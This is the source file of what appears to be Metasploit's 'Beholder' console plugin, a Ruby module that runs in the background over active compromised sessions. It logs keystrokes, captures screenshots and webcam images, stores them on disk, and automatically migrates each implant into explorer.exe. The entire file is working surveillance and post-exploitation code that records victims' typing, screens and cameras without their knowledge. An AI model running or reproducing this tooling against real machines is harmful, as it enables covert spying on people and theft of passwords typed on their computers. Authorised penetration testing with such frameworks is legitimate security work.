plugins/beholder.rb
# -*- coding:binary -*-
require 'fileutils'
module Msf
class Plugin::Beholder < Msf::Plugin
#
# Worker Thread
#
class BeholderWorker
attr_accessor :framework, :config, :driver, :thread, :state
def initialize(framework, config, driver)
self.state = {}
self.framework = framework
self.config = config
self.driver = driver
self.thread = framework.threads.spawn('BeholderWorker', false) do
begin
start
rescue ::Exception => e
warn "BeholderWorker: #{e.class} #{e} #{e.backtrace}"
end
# Mark this worker as dead
self.thread = nil
end
end
def stop
return unless thread
begin
thread.kill
rescue StandardError
nil
end
self.thread = nil
end
def start
driver.print_status("Beholder is logging to #{config[:base]}")
bool_options = %i[screenshot webcam keystrokes automigrate]
bool_options.each do |o|
config[o] = !(config[o].to_s =~ /^[yt1]/i).nil?
end
int_options = %i[idle freq]
int_options.each do |o|
config[o] = config[o].to_i
end
::FileUtils.mkdir_p(config[:base])
loop do
framework.sessions.each_key do |sid|
if state[sid].nil? ||
(state[sid][:last_update] + config[:freq] < Time.now.to_f)
process(sid)
end
rescue ::Exception => e
session_log(sid, "triggered an exception: #{e.class} #{e} #{e.backtrace}")
end
sleep(1)
end
end
def process(sid)
state[sid] ||= {}
store_session_info(sid)
return unless compatible?(sid)
return if stale_session?(sid)
verify_migration(sid)
cache_sysinfo(sid)
collect_keystrokes(sid)
collect_screenshot(sid)
collect_webcam(sid)
end
def session_log(sid, msg)
::File.open(::File.join(config[:base], 'session.log'), 'a') do |fd|
fd.puts "#{Time.now.strftime('%Y-%m-%d %H:%M:%S')} Session #{sid} [#{state[sid][:info]}] #{msg}"
end
end
def store_session_info(sid)
state[sid][:last_update] = Time.now.to_f
return if state[sid][:initialized]
state[sid][:info] = framework.sessions[sid].info
session_log(sid, 'registered')
state[sid][:initialized] = true
end
def capture_filename(sid)
state[sid][:name] + '_' + Time.now.strftime('%Y%m%d-%H%M%S')
end
def store_keystrokes(sid, data)
return if data.empty?
filename = capture_filename(sid) + '_keystrokes.txt'
::File.open(::File.join(config[:base], filename), 'wb') { |fd| fd.write(data) }
session_log(sid, "captured keystrokes to #{filename}")
end
def store_screenshot(sid, data)
filename = capture_filename(sid) + '_screenshot.jpg'
::File.open(::File.join(config[:base], filename), 'wb') { |fd| fd.write(data) }
session_log(sid, "captured screenshot to #{filename}")
end
def store_webcam(sid, data)
filename = capture_filename(sid) + '_webcam.jpg'
::File.open(::File.join(config[:base], filename), 'wb') { |fd| fd.write(data) }
session_log(sid, "captured webcam snap to #{filename}")
end
# TODO: Stop the keystroke scanner when the plugin exits
def collect_keystrokes(sid)
return unless config[:keystrokes]
sess = framework.sessions[sid]
unless state[sid][:keyscan]
# Consume any error (happens if the keystroke thread is already active)
begin
sess.ui.keyscan_start
rescue StandardError
nil
end
state[sid][:keyscan] = true
return
end
collected_keys = sess.ui.keyscan_dump
store_keystrokes(sid, collected_keys)
end
# TODO: Specify image quality
def collect_screenshot(sid)
return unless config[:screenshot]
sess = framework.sessions[sid]
collected_image = sess.ui.screenshot(50)
store_screenshot(sid, collected_image)
end
# TODO: Specify webcam index and frame quality
def collect_webcam(sid)
return unless config[:webcam]
sess = framework.sessions[sid]
begin
sess.webcam.webcam_start(1)
collected_image = sess.webcam.webcam_get_frame(100)
store_webcam(sid, collected_image)
ensure
sess.webcam.webcam_stop
end
end
def cache_sysinfo(sid)
return if state[sid][:sysinfo]
state[sid][:sysinfo] = framework.sessions[sid].sys.config.sysinfo
state[sid][:name] = "#{sid}_" + (state[sid][:sysinfo]['Computer'] || 'Unknown').gsub(/[^A-Za-z0-9._-]/, '')
end
def verify_migration(sid)
return unless config[:automigrate]
return if state[sid][:migrated]
sess = framework.sessions[sid]
# Are we in an explorer process already?
pid = sess.sys.process.getpid
session_log(sid, "has process ID #{pid}")
ps = sess.sys.process.get_processes
this_ps = ps.select { |x| x['pid'] == pid }.first
# Already in explorer? Mark the session and move on
if this_ps && this_ps['name'].to_s.downcase == 'explorer.exe'
session_log(sid, 'is already in explorer.exe')
state[sid][:migrated] = true
return
end
# Attempt to migrate, but flag that we tried either way
state[sid][:migrated] = true
# Grab the first explorer.exe process we find that we have rights to
target_ps = ps.select { |x| x['name'].to_s.downcase == 'explorer.exe' && x['user'].to_s != '' }.first
unless target_ps
# No explorer.exe process?
session_log(sid, 'no explorer.exe process found for automigrate')
return
end
# Attempt to migrate to the target pid
session_log(sid, "attempting to migrate to #{target_ps.inspect}")
sess.core.migrate(target_ps['pid'])
end
# Only support sessions that have core.migrate()
def compatible?(sid)
framework.sessions[sid].respond_to?(:core) &&
framework.sessions[sid].core.respond_to?(:migrate)
end
# Skip sessions with ancient last checkin times
def stale_session?(sid)
return unless framework.sessions[sid].respond_to?(:last_checkin)
session_age = Time.now.to_i - framework.sessions[sid].last_checkin.to_i
# TODO: Make the max age configurable, for now 5 minutes seems reasonable
if session_age > 300
session_log(sid, "is a stale session, skipping, last checked in #{session_age} seconds ago")
return true
end
return
end
end
#
# Command Dispatcher
#
class BeholderCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
@@beholder_config = {
screenshot: true,
webcam: false,
keystrokes: true,
automigrate: true,
base: ::File.join(Msf::Config.config_directory, 'beholder', Time.now.strftime('%Y-%m-%d.%s')),
freq: 30,
# TODO: Only capture when the idle threshold has been reached
idle: 0
}
@@beholder_worker = nil
def name
'Beholder'
end
def commands
{
'beholder_start' => 'Start capturing data',
'beholder_stop' => 'Stop capturing data',
'beholder_conf' => 'Configure capture parameters'
}
end
def cmd_beholder_stop(*_args)
unless @@beholder_worker
print_error('Error: Beholder is not active')
return
end
print_status('Beholder is shutting down...')
stop_beholder
end
def cmd_beholder_conf(*args)
parse_config(*args)
print_status('Beholder Configuration')
print_status('----------------------')
@@beholder_config.each_pair do |k, v|
print_status(" #{k}: #{v}")
end
end
def cmd_beholder_start(*args)
opts = Rex::Parser::Arguments.new(
'-h' => [ false, 'This help menu']
)
opts.parse(args) do |opt, _idx, _val|
case opt
when '-h'
print_line('Usage: beholder_start [base=</path/to/directory>] [screenshot=<true|false>] [webcam=<true|false>] [keystrokes=<true|false>] [automigrate=<true|false>] [freq=30]')
print_line(opts.usage)
return
end
end
if @@beholder_worker
print_error('Error: Beholder is already active, use beholder_stop to terminate')
return
end
parse_config(*args)
start_beholder
end
def parse_config(*args)
new_config = args.map { |x| x.split('=', 2) }
new_config.each do |c|
unless @@beholder_config.key?(c.first.to_sym)
print_error("Invalid configuration option: #{c.first}")
next
end
@@beholder_config[c.first.to_sym] = c.last
end
end
def stop_beholder
@@beholder_worker.stop if @@beholder_worker
@@beholder_worker = nil
end
def start_beholder
@@beholder_worker = BeholderWorker.new(framework, @@beholder_config, driver)
end
end
#
# Plugin Interface
#
def initialize(framework, opts)
super
add_console_dispatcher(BeholderCommandDispatcher)
end
def cleanup
remove_console_dispatcher('Beholder')
end
def name
'beholder'
end
def desc
'Capture screenshots, webcam pictures, and keystrokes from active sessions'
end
end
end